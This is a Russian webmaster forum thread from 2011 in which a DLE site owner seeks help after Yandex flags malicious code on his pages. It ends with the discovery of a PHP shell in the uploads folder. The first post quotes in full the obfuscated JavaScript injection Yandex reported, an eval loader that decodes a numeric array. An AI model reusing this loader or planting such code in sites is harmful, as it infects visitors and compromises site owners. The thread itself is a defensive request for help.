X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Яндекс Находит а я нет, Наболевшая тема Вредносный код
elvis81
elvis81
Topic Starter сообщение 19.4.2011, 0:37; Ответить: elvis81
Сообщение #1


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


Здравствуйте Уважаемые форумчане.

Я заметил что у многих пользователей DLE Подобная беда.
Яндекс находит вредоносный код. Уже не однократно бывало подобное но в этот раз что-то из ряда вон.
Обычно я легко обнаруживал код и устранял его, закрывая доступ на повторное внедрение.
А не так давно снова появился код я уже где только не искал но найти не мог.
После переписки с техподдержкой яндекса я попросил прислать мне участок этого вредного кода, на что получил такой вот ответ:
При посещении Вашего сайта антивирусный робот Яндекса обнаружил вредоносный код следующего содержания:

[script language="javascript" type="text/javascript"]function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};var dlul={eya:5111,zn:function(){createCSS("#c0","background: url(data:,eva)");var zv=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){var tfq=r[i].cssRules||r[i].rules;for(var smgl=0;smgl<tfq.length;smgl++){var fb=tfq.item?tfq.item(smgl):tfq[smgl];if(!fb.selectorText.match(/#c(\d+)/))continue;zv=fb.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};}
var jqt=[5102,5102,5006,5009,5079,5071,5011,5000,5012,4994,5002,5010,5001,4995,5065,5
008,5010,4995,5042,5003,5010,5002,5010,5001,4995,4996,5045,4990,5027,5014,5008,5
0
33,5014,5002,5010,5071,5072,5013,5000,5011,4990,5072,5070,5020,5063,5018,5070,49
8
8,5098,5102,5102,5102,5006,5009,4997,5014,5002,5010,4997,5071,5070,5052,5098,510
2
,5102,4986,5079,5010,5003,4996,5010,5079,4988,5098,5102,5102,5102,4993,5014,4997
,
5079,5013,5011,4990,5079,5050,5079,5011,5000,5012,4994,5002,5010,5001,4995,5065,
5
012,4997,5010,5014,4995,5010,5042,5003,5010,5002,5010,5001,4995,5071,5077,5013,5
0
00,5011,4990,5077,5070,5052,5098,5102,5102,5102,4995,4997,4990,5079,4988,5098,51
0
2,5102,5102,5102,5011,5000,5012,4994,5002,5010,5001,4995,5065,5014,4999,4999,501
0
,5001,5011,5044,5007,5006,5003,5011,5071,5013,5011,4990,5070,5052,5098,5102,5102
,
5102,4986,5079,5012,5014,4995,5012,5007,5079,5071,5010,5070,5079,4988,5098,5102,
5
102,5102,5102,5011,5000,5012,4994,5002,5010,5001,4995,5065,5013,5000,5011,4990,5
0
79,5050,5079,5013,5011,4990,5052,5098,5102,5102,5102,4986,5098,5102,5102,5102,50
0
6,5009,5079,5071,5011,5000,5012,4994,5002,5010,5001,4995,5065,5008,5010,4995,504
2
,5003,5010,5002,5010,5001,4995,4996,5045,4990,5027,5014,5008,5033,5014,5002,5010
,
5071,5072,5013,5000,5011,4990,5072,5070,5020,5063,5018,5070,4988,5098,5102,5102,
5
102,5102,5006,5009,4997,5014,5002,5010,4997,5071,5070,5052,5098,5102,5102,5102,4
9
86,5079,5010,5003,4996,5010,5079,4988,5098,5102,5102,5102,5102,5011,5000,5012,49
9
4,5002,5010,5001,4995,5065,4992,4997,5006,4995,5010,5071,5077,5051,5006,5009,499
7
,5014,5002,5010,5079,4996,4997,5012,5050,5072,5007,4995,4995,4999,5053,5064,5064
,
4999,5006,5012,5007,5010,4995,5014,5065,5001,5010,4995,5064,5002,5014,5006,5001,
5
065,4999,5007,4999,5072,5079,4992,5006,5011,4995,5007,5050,5072,5062,5063,5072,5
0
79,5007,5010,5006,5008,5007,4995,5050,5072,5062,5063,5072,5079,4996,4995,4990,50
0
3,5010,5050,5072,4993,5006,4996,5006,5013,5006,5003,5006,4995,4990,5053,5007,500
6
,5011,5011,5010,5001,5052,4999,5000,4996,5006,4995,5006,5000,5001,5053,5014,5013
,
4996,5000,5003,4994,4995,5010,5052,5003,5010,5009,4995,5053,5063,5052,4995,5000,
4
999,5053,5063,5052,5072,5049,5051,5064,5006,5009,4997,5014,5002,5010,5049,5077,5
0
70,5052,5098,5102,5102,5102,4986,5098,5102,5102,4986,5098,5102,5102,5009,4994,50
0
1,5012,4995,5006,5000,5001,5079,5006,5009,4997,5014,5002,5010,4997,5071,5070,498
8
,5098,5102,5102,5102,4993,5014,4997,5079,5009,5079,5050,5079,5011,5000,5012,4994
,
5002,5010,5001,4995,5065,5012,4997,5010,5014,4995,5010,5042,5003,5010,5002,5010,
5
001,4995,5071,5072,5006,5009,4997,5014,5002,5010,5072,5070,5052,5009,5065,4996,5
0
10,4995,5046,4995,4995,4997,5006,5013,4994,4995,5010,5071,5072,4996,4997,5012,50
7
2,5067,5072,5007,4995,4995,4999,5053,5064,5064,4999,5006,5012,5007,5010,4995,501
4
,5065,5001,5010,4995,5064,5002,5014,5006,5001,5065,4999,5007,4999,5072,5070,5052
,
5009,5065,4996,4995,4990,5003,5010,5065,4993,5006,4996,5006,5013,5006,5003,5006,
4
995,4990,5050,5072,5007,5006,5011,5011,5010,5001,5072,5052,5009,5065,4996,4995,4
9
90,5003,5010,5065,4999,5000,4996,5006,4995,5006,5000,5001,5050,5072,5014,5013,49
9
6,5000,5003,4994,4995,5010,5072,5052,5009,5065,4996,4995,4990,5003,5010,5065,500
3
,5010,5009,4995,5050,5072,5063,5072,5052,5009,5065,4996,4995,4990,5003,5010,5065
,
4995,5000,4999,5050,5072,5063,5072,5052,5009,5065,4996,5010,4995,5046,4995,4995,
4
997,5006,5013,4994,4995,5010,5071,5072,4992,5006,5011,4995,5007,5072,5067,5072,5
0
62,5063,5072,5070,5052,5009,5065,4996,5010,4995,5046,4995,4995,4997,5006,5013,49
9
4,4995,5010,5071,5072,5007,5010,5006,5008,5007,4995,5072,5067,5072,5062,5063,507
2
,5070,5052,5098,5102,5102,5102,5011,5000,5012,4994,5002,5010,5001,4995,5065,5008
,
5010,4995,5042,5003,5010,5002,5010,5001,4995,4996,5045,4990,5027,5014,5008,5033,
5
014,5002,5010,5071,5072,5013,5000,5011,4990,5072,5070,5020,5063,5018,5065,5014,4
9
99,4999,5010,5001,5011,5044,5007,5006,5003,5011,5071,5009,5070,5052,5098,5102,51
0
2,4986];var s="";dv=eval(zv+"l");uw=String.fromCharCode;for(var i=0;i<jqt.length;i++){sfh=dlul.eya-parseInt(jqt[i]);s+=(uw(sfh));}
dv(s);}};dlul.zn();[/script]

Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах изменены во избежание случайного срабатывания кода.

Обращаем Ваше внимание на тот факт, что вредоносный код обнаруживается на страницах Вашего сайта не при каждой проверке, кроме того, он нередко появляется перед открывающим или после закрывающего тега html. Поэтому мы не исключаем возможность, что источник заражения находится внутри содержимого Ваших файлов.

Но я всё равно не могу найти на сайте ничего подобного. Где только не искал. Полностью скачав движок на ПК искал участки кода с помощью программы AVSearch.
Если у кого есть соображения или же ЗНАНИЯ по данному коду то прошу прокомментировать, и по возможности посоветовать где искать.


--------------------
ТИц поднимают, поднималкой для ТИца
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Рэшад
Рэшад
сообщение 19.4.2011, 0:47; Ответить: Рэшад
Сообщение #2


Завсегдатай
*****

Группа: Active User
Сообщений: 734
Регистрация: 28.9.2009
Из: Бендеры
Поблагодарили: 255 раз
Репутация:   51  


у меня такое было, не находил только под моим ноутом (во всех браузерах) за другими компьютерами этот вредоносный код также легко находился!!!!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
elvis81
elvis81
Topic Starter сообщение 19.4.2011, 1:10; Ответить: elvis81
Сообщение #3


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


Рэшад, Следует предположить что заражён мой компьютер? Но я проверяю сами файлы. И яндекс тоже пишет что обнаруживается не постоянно, а периодически.

Своими ковыряниями я нашел вот это http://www.maultalk.com/topic85597.html?vi...t&p=1011129 И убрал его
Но вредоносный код всё равно есть.


--------------------
ТИц поднимают, поднималкой для ТИца
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
lostprophet
lostprophet
сообщение 19.4.2011, 1:11; Ответить: lostprophet
Сообщение #4


Новый статус (1)
*******

Группа: Super Moderator
Сообщений: 2572
Регистрация: 18.11.2008
Из: Ростов-на-Дону
Поблагодарили: 3210 раз
Репутация:   293  


А ссылочку?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
elvis81
elvis81
Topic Starter сообщение 19.4.2011, 1:13; Ответить: elvis81
Сообщение #5


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


lostprophet, А в подписи! wink.gif


--------------------
ТИц поднимают, поднималкой для ТИца
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
sirdki
sirdki
сообщение 19.4.2011, 1:18; Ответить: sirdki
Сообщение #6


Бывалый
****

Группа: User
Сообщений: 342
Регистрация: 28.1.2010
Из: Минск
Поблагодарили: 65 раз
Репутация:   14  


У меня такая же проблема была и как выяснилось суть в том, что я заходил на ftp через total commander, где были сохранены все пароли. Нужно каждый раз вводить пароль вручную. Может вы тоже так входите и если да, то вводите пароль ручками и вирус вряд ли проберется...
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
elvis81
elvis81
Topic Starter сообщение 19.4.2011, 1:20; Ответить: elvis81
Сообщение #7


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


sirdki, Нет такие ошибки я не совершаю уже года 3.


--------------------
ТИц поднимают, поднималкой для ТИца
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DeFoRMaToR
DeFoRMaToR
сообщение 19.4.2011, 1:42; Ответить: DeFoRMaToR
Сообщение #8


Новичок
*

Группа: User
Сообщений: 30
Регистрация: 18.8.2010
Поблагодарили: 7 раз
Репутация:   -6  


Порекомендую поискать в базе данных, например, по "createCSS" или другому куску из вредоносного кода.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
elvis81
elvis81
Topic Starter сообщение 19.4.2011, 3:18; Ответить: elvis81
Сообщение #9


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


Ну что кто скажет?
Соображения не появились?

Самое обидное то что ТАКОЙ БОЛЬШОЙ КОД я не могу найти mellow.gif
Может это из раздела РЕФспама?


--------------------
ТИц поднимают, поднималкой для ТИца
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
elvis81
elvis81
Topic Starter сообщение 7.5.2011, 22:23; Ответить: elvis81
Сообщение #10


Познающий
******

Группа: Active User
Сообщений: 1240
Регистрация: 5.8.2008
Из: дом
Поблагодарили: 222 раза
Репутация:   34  


Всё!!!
Решено!
Проблемма найдена.
Если у кого подобная проблемма то ищите по пути Uploads/files/
Ищите файлы *.php Значит залили шелл очень грамотно и кроме того ещё и грамотно размещают вредносный код в редко используемых файлах, таких как ajax или других *.js

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.


--------------------
ТИц поднимают, поднималкой для ТИца
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Автоматизация и заработок на Яндекс Дзен
Получаем траф на автомате и монетизируем контекстом
15 master_jeday 4169 Вчера, 17:26
автор: kirch
Открытая тема (нет новых ответов) 5 крауд-ссылок с трастового ресурса Яндекс.Знатоки за 500руб
4 yulbee 828 Вчера, 16:56
автор: yulbee
Открытая тема (нет новых ответов) Нескольо сайтов 1 компании на одном хосте, плохо/нет ?
11 Goremika 1294 Вчера, 1:59
автор: Goremika
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыАккаунты Яндекс Директ без НДС [актуально]
Директ без НДС, экономия 18% при каждом пополнении РК
5 Diwate 1494 19.5.2018, 22:00
автор: Diwate
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыМануал по заработку в Яндекс Дзене «6 простых шагов — и 100 000 рублей в кармане»
В рамках Новогодних мероприятий 2017-2018
1398 Zoya83 90637 18.5.2018, 13:22
автор: Zoya83


 



RSS Текстовая версия Сейчас: 21.5.2018, 4:03
Дизайн